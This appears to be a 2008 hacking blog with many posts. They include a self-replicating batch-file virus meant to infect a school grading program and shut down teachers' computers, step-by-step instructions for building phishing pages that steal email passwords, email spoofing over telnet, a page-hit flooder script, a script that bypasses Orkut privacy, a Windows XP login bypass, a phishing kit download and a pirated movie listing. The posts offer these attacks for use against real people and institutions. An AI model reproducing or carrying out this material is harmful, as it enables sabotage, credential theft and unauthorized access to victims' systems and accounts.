Click on the inverted triangle beside Reply. Select Show Orginal.
4. manually find the IP address, proceed to 5. 5. Look for Received: from followed by the IP address between square brackets [ ].
Received: from [69.138.30.1] by web4587.mail.***.yahoo.com 6. If you find more than one Received: from patterns, select the last one. 7. Track the IP address of the sender
Finding IP address in Yahoo! Mail 1. Log into your Yahoo! mail with your username and password. 2. Click on Inbox or whichever folder you have stored your mail. 3. Open the mail. 4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers, • • • • • •
Click on Options on the top-right corner In the Mail Options page, click on General Preferences Scroll down to Messages where you have the Headers option Make sure that Show all headers on incoming messages is selected Click on the Save button Go back to the mails and open that mail
5. You should see similar headers like above Or if you want to manually find the IP address, proceed to 6. 6. Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109. That is be the IP address of the sender. If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP. 7. Track the IP address of the sender
Finding IP address in Hotmail 1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top. 3. Open the mail. 4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers, • • • • •
Click on Options on the top-right corner In the Mail Options page, click on Mail Display Settings In Message Headers, make sure Advanced option is checked Click on Ok button Go back to the mails and open that mail
5. You should see the email headers now. 6. manually find the IP address, proceed to 7. 7. If you find a header with X-Originating-IP: followed by an IP address, that is the sender’s IP address Hotmail headers In this case the IP address of the sender is [68.34.60.59]. 8. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers Look for Received: from followed by IP address within square brackets[ In this case, the IP address of the sender is [69.140.7.58]. 9. Or else if you have headers like this Hotmail headers Look for Received: from followed by IP address within square brackets[]. In this case, the IP address of the sender is [61.83.145.129] (Spam mail). 10. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com. 11. Track the IP address of the sender
3 Comments »
Shut Down Your School! Posted in XP Hacking, hacking with tags hack into school computers, hacking computers, hacking in school, how to shut down your school, shut down your school! on April 4, 2008 by hacktocrack
By using the following command you can shutdown your school or college by using only Note pad. This is the main command that will be launched upon startup. Type this in Notepad. @echo off shutdown.exe -s -t 10 -c “You have been hacked!” Save this as shutdown.bat, making sure you choose all files as the filetype. Step 2 Make it run on Startup The file you need can be downloaded here: This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI. http://www.mutantsrus.com/Update.reg Step 3 Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe. Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti Here is the code: @echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit Save this as global.bat Step 4 They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there. @echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:
\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?: \$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?: \$start real.exeexit Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one. Step 5 The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it. @echo off shutdown -acd C:\WINDOWSdel shutdown.bat Save as cure.bat @echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS Now download this file: http://www.mutantsrus.com/cure.exe Step 6 The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.) 3 Comments »
Hide Your Files In a JPEG Posted in Easy Hacking, hacking, offline hacking with tags free tips, hacking, hacking tips, hacking tricks, hide files, hide files in jpeg, hide folders, hide your files in a jpeg, how to hide files, how to hide folders on April 3, 2008 by hacktocrack
Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed. Ok, lets begin…
1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED). 2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden). 3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden. 4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden. 5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. 6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive . 3 Comments »
Website Hacking Posted in Hardcore Hacking, Internet Explorer, Javascript/html Hacking, Mozilla Firefox, Password Hacking, Website hacks, cmd, hack websites, hacking websites with tags hack a website, hack google, hack website, hacking, hacking tips, hacking tricks, how to hack a website on April 1, 2008 by hacktocrack
Note: This is for Average Hackerz, Not Newbies This article was taken from http://www.ifinityexists.com we are explaining the website attack known as Cross-Site Scripting (XSS). Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website. Cross-Site Scripting is most commonly used to steal cookies. Cookies are used for authenticating, tracking, and maintaining specific information about users; therefore, by stealing a user’s cookies an attacker could bypass the website’s access control. There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and Non-Persistent Cross-Site Scripting attacks.Live Stream Here Download Here Download Cookie Catcher Here Get a md5 password hasher, to decrypt the hash 7 Comments »
Page hits flooder Posted in hack websites with tags flood page hits, hack page hits, page hits flooder on March 27, 2008 by hacktocrack
This small program can flood ur page hits. but you have to dedicate one browser for it.. like internet explorer method: make a batch file with these lines @echo off :1 start C:\Progra~1\Intern~1\iexplore.exe “http://yoursite.com“ ping -n 10 127.0.0.1 >nul taskkill.exe /im iexplore.exe goto 1 depending upon your net speed u may increase the 10 secs time wait with 10 sec time u may have 360 hits in an hour with 5 sec time u may have 720 hits in an hour 6 Comments »
Hack - View Locked Scrapbooks Posted in Easy Hacking, Orkut, Website hacks, hacking with tags free hacking tips, hack locked scrapbooks, hacking, hacking tips, View Locked Scrapbooks on March 27, 2008 by hacktocrack
How To Use this Hack? There are three ways to use this hack.You can choose the one that best suits you. a> Login To Your Sandbox Profile and Directly View The Locked Scrapbook or b> Using this Javascript : * Navigate to the profile which has disallowed non-friends to view his/her scrapbook * Run this script in the address bar * javascript:document.location=’http://scraphack.cspbrasil.com/ViewScraps.php?uid=’+en codeURIComponent(location.href);void(0)
* Wait for 4-5 seconds and you will get to see the scraps. or c> Userscript (Credits - D3 ) - The Recommended Method because you need not run any script again and again. Kindly follow the instructions stated below: * Install Grease Monkey in case you don’t have it - Search for it on google (another way to resort to Firefox) * Install View Locked Scrapbook Script * In case you have any problems downloading or operating these scripts, you must read this tutorial. Leave A Comment »
Create your own f@ke login page!!! Posted in Easy Hacking, Hotmail, Password Hacking, Website hacks, Yahoo, hacking with tags create yahoo fake login page, create your own fake login page, fake login, fake login page, hack hotmail, hack yahoo login page, phisher login on March 27, 2008 by hacktocrack
This is an easier version from the “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other” This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox. If you found this easy, then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other” Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you The process of Hacking anyone’s id using fake login pages is known as Phishing Now let’s learn how to create your very own fake login page. {1} Open www.jotform.com and Sign Up. {2} then Login there with your newly registered account. {3} now click on ‘ Create your first form’. {4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.) {5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo) {6} Now Click on ‘Power Tool’ Option (In right hand side…) {7} Double click on ‘Password Box’. Now Click the newly form password entry to edit
it. Rename it as ‘Password:’ {8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties. {9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim. {10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…) {11} Now Click on ‘Save’. After saving, click on ‘Source’ Option. {12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′. {13} Now open Notepad text editor and write the following code their. Paste the Option2 code here {14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it. Now you can view it by typing the url in the address bar. NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily. I suppose that you created your account at 110mb.com now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done. Now you can access you file on the net by just typing the url ofthe file. And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form. see my fake login page http://www.citkatboy.110mb.com/index.html 59 Comments »
Essential Bluetooth hacking tools Posted in Uncategorized with tags bluesnarf, bluetooth hack, bluetooth sniffer, download bloover, download bluebugger, download bluediving, download bluescan, download bluesnarfer, download bluesniff, download bluetest, download btauding, download btbrowser, download btcrack, download cihwb, download t-bear, hack, hack bluetooth, hacking, how to bluesnarf on March 26, 2008 by hacktocrack
Bluetooth technology is great. No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).If you want the best Bluetooth hacker java app, then refer to the “Super Bluetooth Hack” post
If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them. This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices. Discovering Bluetooth Devices BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. Download BlueScan. BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. Download BlueSniff. BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification. Download BTBrowser. BTCrawler -BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Download BTCrawler. Hacking Bluetooth Devices BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. Download BlueBugger. CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Download CIHWB. Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Download Bluediving.
Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Download T-BEAR. Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetoothenabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. Download Bluesnarfer. BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Download BTcrack. Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. Download Blooover II. BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. Download BlueTest. BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. Download BTAuding. What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis. 6 Comments »
Small Hack For Orkut Posted in Mozilla Firefox, Orkut with tags hack orkut, orkut hacks on March 26, 2008 by hacktocrack
Taken From http://bothack.wordpress.com/2006/06/15/hacking-orkut/ Orkut a very famous social networking site has an option called scrapbook. Now for those people who scrap many times a minute, here is a hack: If you are using firefox, Install this script (addon) and it will allow you to scrap back just in one click rather than the traditional 2 step + 1 click scrapping. This not only saves time, but also helps you keep things contextual.
Screenshot (click to enlarge):
Another reason to shift to firefox
works with all versions of firefox.
9 Comments »
Top 15 Hacking Software Posted in Download, Easy Hacking, Hardcore Hacking, IP tools, Javascript/html Hacking, hacking, offline hacking with tags best hacking software, Easy Hacking, hacking software on March 18, 2008 by hacktocrack
1. Nmap I think everyone has heard of this one, recently evolved into the 4.x series. Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source. Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results. Get Nmap Here 2. Nessus Remote Security Scanner Recently went closed source, but is still essentially free. Works with a client-server framework. Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing
significant cost savings by using Nessus to audit business-critical enterprise devices and applications. Get Nessus Here 3. John the Ripper Yes, JTR 1.7 was recently released! John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches. You can get JTR Here 4. Nikto Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those). Get Nikto Here 5. SuperScan Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan. If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice. Get SuperScan Here 6. p0f P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
- machines that connect to your box (SYN mode), - machines you connect to (SYN+ACK mode), - machine you cannot connect to (RST+ mode), - machines whose communications you can observe. Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine. Get p0f Here 7. Wireshark (Formely Ethereal) Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later. Get Wireshark Here 8. Yersinia Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP). The best Layer 2 kit there is. Get Yersinia Here 9. Eraser Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License. An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.
Get Eraser Here. 10. PuTTY PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients. Get PuTTY Here. 11. LCP Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing. A good free alternative to L0phtcrack. LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article. Get LCP Here 12. Cain and Abel My personal favourite for password cracking of any kind. Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. Get Cain and Abel Here 13. Kismet Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic. A good wireless tool as long as your card supports rfmon (look for an orinocco gold). Get Kismet Here 14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving. NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses: • • • • • •
Verify that your network is set up the way you intended. Find locations with poor coverage in your WLAN. Detect other networks that may be causing interference on your network. Detect unauthorized “rogue” access points in your workplace. Help aim directional antennas for long-haul WLAN links. Use it recreationally for WarDriving.
Get NetStumbler Here 15. hping To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills. hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features. Get hping Here Source:http://www.darknet.org.uk/2006/04/top-15-securityhacking-tools-utilities/ 7 Comments »
Spoofing Via Telnet Posted in Email, Telnet, cmd with tags fake email send, fake smtp, send fake email, spoofing telnet on March 18, 2008 by hacktocrack
Get a smtp server ( i use mx1.hotmail.com) they’re normally likemx1,mx2 etc..thehost.com. Now, go to Start>Run>cmd then in the cmd window, Type telnet mx1.hotmail.com 25 then HELO hotmail.com then MAIL FROM : (fake email here)
then RCPT TO: (person)then DATA then type your message, you can press enter for a new line, finish the message by a full stop (.) on a new line, press enter! spoofed. For Educational purpose only Didn’t it work? Go www.deadfake.com 1 Comment »
Auto Ph$her / Fake Web Login Creator Posted in Uncategorized on March 13, 2008 by hacktocrack
Auto Ph!$her / fake Web Login Creator — By DaveDaDon All u need to do is write in the source of the page u wanna ph!$h and it will make the phisher for u automatically, and it even saves it as well. Download http://rapidshare.com/files/90895580/Fishing_Bait_2.5.rar Password: PremSoni 5 Comments »
Get IP address anonymity everytime Posted in IP tools, Other with tags hide proxy, hide your ip, ip hider, proxy hider on March 13, 2008 by hacktocrack
i have found one software which hide your IP address every time and give you a new IP address by creating a Tor Network……. If u have Mozilla then it works very fine First Download Vidalia Bundle from here http://www.torproject.org/download.html.en Here is link for Windows and MAC OS ……….So download it according to your requirement .
After that to easily turn on and turn off “TOR” .. You can install Firefox add on from here : https://addons.mozilla.org/en-US/firefox/addon/2275 then restart firefox….After that you will see at right bottom corner that your tor addon for mozilla is installed…now when u want to hide your IP or want to surfing anonymously Turn on or turn off by clicking on this. You can check your ip address here http://www.whatismyip.com/ 3 Comments »
A Cool Forum To Join Posted in Uncategorized with tags cool forum, free movies, full games, full music albums on March 11, 2008 by hacktocrack
Join www.causewearecool.co.nr To get the latest Downloads Of Full Movies, Games, Music, Etc Check it out Leave A Comment »
Fastest Way To Hack into Someones System Posted in Download, Easy Hacking, Hardcore Hacking with tags hack, fastest hack, easiest hack, free portscanner on March 4, 2008 by hacktocrack
Well as I already mentioned you can hack any system as it is conected to what we call “INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked. Steps: 1. Software PORT SCANNER from google. 2. The IP address of the victim whose port is open. 3. NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet…. 4. The IP of victim u found initially into NETLAB . 5. Thats it now you can access his system.
Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don’t try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily. 8 Comments »
A Cool Game To Play Posted in Other with tags game, maze on March 2, 2008 by hacktocrack
Here’s A Cool Game To play If You Are Bored, Beat Me I Reached Level 5. Turn Up The volume Very High, It’s Soft
1 Comment »
Hack This Website Test Posted in hack websites with tags hack, hack test, hack this website on March 2, 2008 by hacktocrack
If you really think you are a hacker, then Go to www.hack-test.com Reply with what level you are on
11 Comments »
Download Jumper (2008) Posted in Cracks/Wares, Download, Movies, Other with tags download full movie, download jumper movie, free jumper movie on February 29, 2008 by hacktocrack Jumper.TS.XViD-PreVail Title: Theater Date: Release Date: CD/INFO: Framerate: Audio: Type: IMDB Rating: URL: Genre:
Jumper.2008 February.17.2008 February.14.2008 Cd1-50 x 15mbs 25fps PAL Direct Line XVID 6.4/10 (1,541 votes) http://www.imdb.com/title/tt0489099/ Adventure / Drama / Sci-Fi / Thriller
In These Troubled Times, We shall PreVail!!! Tagline: Anywhere is possible. Plot Outline: A genetic anomaly allows a young man to teleport himself anywhere. He discovers this gift has existed for centuries and finds himself in has been raging for thousands of years between
Hack Windows XP Password Posted in Hardcore Hacking, Password Hacking, XP Hacking, offline hacking with tags DreamPackPL, hack passwords, hack xp password, hacking, how to hack on February 29, 2008 by hacktocrack
Hi, Here’s Another Alternate to The Other Post - “Hack Windows XP Password” Another method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords. There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.
Steps to Hack into a Windows XP Computer without changing password: 1. Get physical access to the machine. Remember that it must have a CD or DVD drive. 2. Download DreamPackPL HERE. 3. Unzip the downloaded dpl.zip and you’ll get dpl.ISO. 4. Use any burning program that can burn ISO images. 5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files. 6. Press “R” to install DreamPackPL. 7. Press “C” to install DreamPackPL by using the recovery console. 8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed) 9. Backup your original sfcfiles.dll by typing: “ren C:WindowsSystem32sfcfiles.dll sfcfiles.lld” (without quotes) 10. Copy the hacked file from CD to system32 folder. Type: “copy D:i386pinball.ex_ C:WindowsSystem32sfcfiles.dll” (without quotes and assuming your CD drive is D 11. Type “exit”, take out disk and reboot. 12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear. 13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type “god” in the password field to get in Windows.You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password. Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive. 6 Comments »
FAKE - Hack Password for Yahoo, Google, Gmail, AOL and MSN Posted in Email, Gmail with tags hacking, hack hotmail, msn freezer, hack msn hotmail, hack msn, how to hack websites, hacking websites, hack website on February 29, 2008 by hacktocrack
DON’T TRY THIS, THIS IS AN EXAMPLE OF WHAT NOT TO DO Go to the “How to hack Hotmail, Gmail, Yahoo, Orkut Or Any Other Post” Instead *********************************************************************
If you are going to execute this, you are fooled. The above steps are false infos. They do not provide you the password. Instead they will actually hack your password: Never be fooled. Never send your password decrypted to any emails. 18 Comments »
Hack Password for Yahoo, Google, Gmail, AOL and MSN Posted in Uncategorized on February 29, 2008 by hacktocrack
AN EXAMPLE OF WHAT NOT TO DO……………………….. STEP 1- Log in to your own yahoo account. Note: Your account must be at least 30 days old for this to work. STEP 2- Once you have logged into your own account, compose/write an e-mail to: [email protected] This is a mailing address to the Retrivepassword. The automated server will send you the password that you have ‘forgotten’, after receiving the information you send them. STEP 3- In the subject line type exactly: ” PASSWORD RECOVERY “ STEP 4- On the first line of your mail write the email address of the person you are hacking. STEP 5- On the second line type in the e-mail address you are using. STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a JavaScript from your account in the Yahoo Server to extract the
other email addresses password. In other word the system automatically checks your password to confirm the integrity of your status. The process will be done automatically by the user administration server. STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly: cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa script< ip://233.243.2.34/cgi-bin/start? v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#> {simply copy and paste above.} so for example if your yahoo id is : [email protected] and your password is: David and the email address you want to hack is: [email protected] then compose the mail as below: To: [email protected] bcc: cc: (Don’t write anything in cc,bcc field) Subject: ” PASSWORD RECOVERY “ [email protected] [email protected] David cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa script< ip://233.243.2.34/cgi-bin/start? v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#> {simply copy and paste above.} The password will be sent to your inbox in a mail called “System Reg Message” from “System. For Gmail: To: [email protected] Sub: Password Request : [email protected] Rest as in yahoo AOL and MSN will be alive soon: If you are going to execute this, you are fooled. The above steps are false infos. They do not provide you the password. Instead they will actually hack your password: Never be fooled. Never send your password decrypted to any emails. 7 Comments »
How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other Posted in Email, Gmail, Hotmail, Password Hacking, Website hacks, Yahoo, hacking with tags hack, hack gmail, hack hotmail, hack msn, hack msn hotmail, hack yahoo, msn freezer on February 28, 2008 by hacktocrack
In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack.But in this new version this problem is eliminated and this is has become more fullproof than the previous version. First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.Now follow the following steps : 1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com 2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text. 3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML 4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with